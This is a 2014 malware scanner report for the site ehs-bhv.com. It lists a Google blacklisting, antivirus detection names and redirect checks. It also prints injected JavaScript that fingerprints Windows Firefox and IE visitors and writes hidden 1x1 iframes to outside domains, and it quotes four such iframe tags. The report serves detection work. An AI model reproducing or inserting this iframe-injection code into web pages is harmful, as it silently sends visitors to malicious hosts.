New scan:

Malware Scanner report for ehs-bhv.com

Malicious/Suspicious/Total urls checked
1/0/2
1 page has malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "ehs-bhv.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/4/4
4 suspicious iframes found. See details below
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=ehs-bhv.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://ehs-bhv.com/
200 OK
Content-Length: 35880
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

var BrowserDetect = { init: function () { this.browser = this.searchString(this.dataBrowser) || "An unknown browser"; this.version = this.searchVersion(navigator.userAgent) || this.searchVersion(navigator.appVersion) || "an unknown version"; this.OS = this.searchString(this.dataOS) || "an unknown OS"; }, searchString: function (data) { for (var i=0;i<data.length;i++) { var dataString = data[i].string; var dataProp = data[i].prop; this.versionSearchString = data[i].versionSearch || data[i].ide
... 1428 bytes are skipped ...
it(); var szCookieString = document.cookie; var boroda = BrowserDetect.browser; var os = BrowserDetect.OS; if ( ((boroda == "Firefox" || boroda == "Explorer") && (os == "Windows")) && (findCookie('geo_idn')!='v48a765e4f75baeb85f0a755fc3ec09c') ) {addCookie("geo_idn","v48a765e4f75baeb85f0a755fc3ec09c",1);document.write('<iframe src="http://karenbrowntx.com" name="Twitter" scrolling="auto" frameborder="no" align="center" height = "1px" width = "1px"></iframe>');}else {}

Antivirus reports:

AntiVir
JS/iFrame.ADD
Avast
JS:Iframe-LB [Trj]
Antiy-AVL
Trojan/win32.agent
Ikarus
Trojan.IFrame
nProtect
Trojan.Iframe.ADD
Emsisoft
Trojan.Iframe.ADD (B)
Comodo
TrojWare.JS.Iframe.ADD
CAT-QuickHeal
JS/Iframe.BC
DrWeb
JS.IFrame.189
Kaspersky
HEUR:Trojan.Script.Iframer
Microsoft
Trojan:JS/Iframe.BC
MicroWorld-eScan
Trojan.Iframe.ADD
NANO-Antivirus
Trojan.Script.Iframe.lttlg
F-Secure
Trojan.Iframe.ADD
VIPRE
Malware.JS.Generic (JS)
F-Prot
IFrame.gen
AVG
HTML/Framer
GData
Trojan.Iframe.ADD
Commtouch
IFrame.gen
ESET-NOD32
HTML/Iframe.B.Gen
BitDefender
Trojan.Iframe.ADD

Hidden iFrame found. The same iFrame was found in 34 websites.
size: 1x1     
src: http://htpcapital.com/main.php?page=98d3bf6d08596d13

<iframe src="http://htpcapital.com/main.php?page=98d3bf6d08596d13" name="twitter" scrolling="auto" frameborder="no" align="center" height = "1px" width = "1px">

Hidden iFrame found. The same iFrame was found in 11 websites.
size: 1x1     
src: http://allegiantcare.com/main.php?page=98d3bf6d08596d13

<iframe src="http://allegiantcare.com/main.php?page=98d3bf6d08596d13" name="twitter" scrolling="auto" frameborder="no" align="center" height = "1px" width = "1px">

Hidden iFrame found. The same iFrame was found in 12 websites.
size: 1x1     
src: http://allegiantstaffing.com

<iframe src="http://allegiantstaffing.com" name="twitter" scrolling="auto" frameborder="no" align="center" height = "1px" width = "1px">

Hidden iFrame found. The same iFrame was found in 46 websites.
size: 1x1     
src: http://karenbrowntx.com

<iframe src="http://karenbrowntx.com" name="twitter" scrolling="auto" frameborder="no" align="center" height = "1px" width = "1px">

http://ehs-bhv.com/test404page.js
404 Not Found
Content-Length: 392
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: ehs-bhv.com

Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 28 Aug 2014 05:49:21 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 35880
Content-Type: text/html

...35880 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: ehs-bhv.com
Referer: http://www.google.com/search?q=ehs-bhv.com

Result:
The result is similar to the first query. There are no suspicious redirects found.